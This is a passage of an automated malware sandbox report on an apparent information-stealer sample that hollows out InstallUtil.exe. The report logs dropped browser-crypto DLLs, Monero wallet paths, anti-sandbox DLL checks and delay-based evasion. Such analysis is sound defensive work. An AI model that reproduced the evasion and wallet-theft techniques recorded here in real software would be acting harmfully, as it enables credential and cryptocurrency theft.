                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mozglue.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wsock32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winhttp.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mswsock.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winnsi.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: 7AeSqNv1rC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: 7AeSqNv1rC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: 7AeSqNv1rC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: mozglue.pdbP source: InstallUtil.exe, 00000004.00000002.2492833314.000000006C6AD000.00000002.00000001.01000000.0000000F.sdmp, InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.4.dr
                        Source: Binary string: freebl3.pdb source: InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                        Source: Binary string: freebl3.pdbp source: InstallUtil.exe, 00000004.00000002.2469157795.0000000022C0B000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                        Source: Binary string: nss3.pdb@ source: InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
                        Source: Binary string: softokn3.pdb@ source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: InstallUtil.exe, 00000004.00000002.2479689311.000000003A9CF000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: InstallUtil.exe, 00000004.00000002.2474489221.000000002EAE4000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
                        Source: Binary string: nss3.pdb source: InstallUtil.exe, 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp, InstallUtil.exe, 00000004.00000002.2482167987.0000000040931000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: InstallUtil.exe, 00000004.00000002.2460567735.000000001C7F6000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2468701715.0000000022768000.00000002.00001000.00020000.00000000.sdmp
                        Source: Binary string: mozglue.pdb source: InstallUtil.exe, 00000004.00000002.2492833314.000000006C6AD000.00000002.00000001.01000000.0000000F.sdmp, InstallUtil.exe, 00000004.00000002.2471746031.0000000028B77000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.4.dr
                        Source: Binary string: softokn3.pdb source: InstallUtil.exe, 00000004.00000002.2477121159.0000000034A58000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr

                        Data Obfuscation

                        barindex
                        .NET source code contains potential unpacker
                        Source: 7AeSqNv1rC.exe, Form1.cs.Net Code: VolatileFunc System.Reflection.Assembly.Load(byte[])
                        Source: 7AeSqNv1rC.exeStatic PE information: 0xB52D572E [Wed Apr 28 02:32:14 2066 UTC]
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00418950
                        Source: freebl3.dll.4.drStatic PE information: section name: .00cfg
                        Source: mozglue.dll.4.drStatic PE information: section name: .00cfg
                        Source: msvcp140.dll.4.drStatic PE information: section name: .didat
                        Source: softokn3.dll.4.drStatic PE information: section name: .00cfg
                        Source: nss3.dll.4.drStatic PE information: section name: .00cfg
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeCode function: 0_2_00007FFD9B7F061A push ebx; iretd 0_2_00007FFD9B7F066A
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeCode function: 0_2_00007FFD9B7F00AD pushad ; iretd 0_2_00007FFD9B7F00C1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0042F142 push ecx; ret 4_2_0042F155
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00422D3B push esi; ret 4_2_00422D3D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0041DDB5 push ecx; ret 4_2_0041DDC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00432715 push 0000004Ch; iretd 4_2_00432726
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_6C66B536 push ecx; ret 4_2_6C66B549
                        Source: 7AeSqNv1rC.exeStatic PE information: section name: .text entropy: 7.623939353720136
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\clip[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00418950
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: 4.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1905965220.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 7AeSqNv1rC.exe PID: 7300, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7648, type: MEMORYSTR
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: InstallUtil.exeBinary or memory string: DIR_WATCH.DLL
                        Source: InstallUtil.exe, 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
                        Source: InstallUtil.exeBinary or memory string: SBIEDLL.DLL
                        Source: InstallUtil.exeBinary or memory string: API_LOG.DLL
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory allocated: 1040000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeMemory allocated: 1ACD0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,4_2_0040180D
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\clip[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeAPI coverage: 7.2 %
                        Source: C:\Users\user\Desktop\7AeSqNv1rC.exe TID: 7320Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exe TID: 3704Thread sleep count: 106 > 30
                        Source: C:\Windows\SysWOW64\cmd.exe TID: 3704Thread sleep time: -53000s >= -30000s
                        Source: C:\Windows\SysWOW64\timeout.exe TID: 7156Thread sleep count: 86 > 30Jump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
                        Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh4_2_00410DDB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_0041543D
